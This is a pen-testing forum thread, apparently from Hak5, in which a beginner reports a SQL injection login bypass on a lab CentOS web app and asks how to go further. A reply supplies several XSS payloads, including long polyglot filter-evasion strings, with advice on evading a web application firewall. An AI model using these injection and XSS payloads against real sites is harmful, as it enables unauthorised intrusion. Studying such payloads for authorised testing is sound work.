Jump to content

Recommended Posts

Hello team, I'm new here as I am new to Penetration testing, my next challenge is to perform proper pen-testing on a Win XP SP2 and a CentOS (WebApp) server, I successfully finished with the Win XP in all aspects as for the CentOS I managed to inject SQL (asd' OR 1=1 OR 'a'='a) into the login form and get basic information but that was it, I tried using  scripts (<script>alert(1);</script>) but nothing worked, nessus scan showed it's XSS vulnerable. 

I guess my main point is how further can I dig into the target and how?

 

Cheers

Link to post
Share on other sites

Unfortunately, without a lot more info, your question is too vague to give any specific help. How good are your HTML and JavaScript skills?

I'd suggest looking at the SecurityTube web app testing videos, they cover stuff like this and should give you a good idea of what is going on.

And if you are following a course, I'd look for a more up-to-date one, anything still using XP as a victim is very out of date.

Link to post
Share on other sites

Also, I would suggest looking in the console of your browser for errors when injecting. 

As already mentioned without knowing the app or js/html of page it's hard to give a working payload

However, you can try either 

-->'";</ScriPT><sCriPt><confirm()</scRiPt> 

Which may better break out of the HTML and is nice and short (similar to what you tried but I included single and double quotes and also the end of a comment just in case you end up in a comment section. 

Or you can try a polyglot injection payload, (these will usually set off a WebApp Firewall but feel free to try)

javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">onerror=confirm().source<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" 

Or 

jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--

which are both attempting to do the same thing. 

Good luck . 

 

*****

EDIT

While it's not my intention to pop alerts on the hak5 forum, you can see that one of the polyglots is working as planned and is breaking out of tags to show a broken image,

This is the equivalent of <img src="x" />

From here you would just need to tweak the code to pop an alert on a broken image, remember to read the console and attempt to bypassing protections.

onerror=confirm() or something similar for a basic pop on a broken image.

****

 

Edited by zoro25
Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...